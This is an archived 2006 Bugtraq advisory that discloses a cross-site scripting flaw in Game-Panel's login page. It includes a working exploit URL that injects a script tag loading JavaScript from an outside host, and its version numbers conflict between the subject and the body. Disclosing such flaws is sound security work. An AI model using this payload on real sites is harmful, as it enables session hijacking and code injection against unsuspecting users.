lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <20060304202803.25187.qmail@securityfocus.com> Date: 4 Mar 2006 20:28:03 -0000 From: retard@...igs.com To: bugtraq@...urityfocus.com Subject: Game-Panel <= 2.1.6 XSS ORIGIONAL SOURCE: http://notlegal.ws/gamepanel.txt summary software: Game-Panel vendors website: http://game-panel.com versions: <= 2.6.1 class: remote status: unpatched exploit: available solution: not available discovered by: sycko risk level: medium description game-panel uses a global variable to print out error messages on their login page allowing execution of javascript exploit(s) http://example.com/login.php?message=%3CSCRIPT%20SRC=http://notlegal.ws/xss.js%3E%3C/SCRIPT%3E credit author(s): retard, jim, and sycko email: retard@...igs.com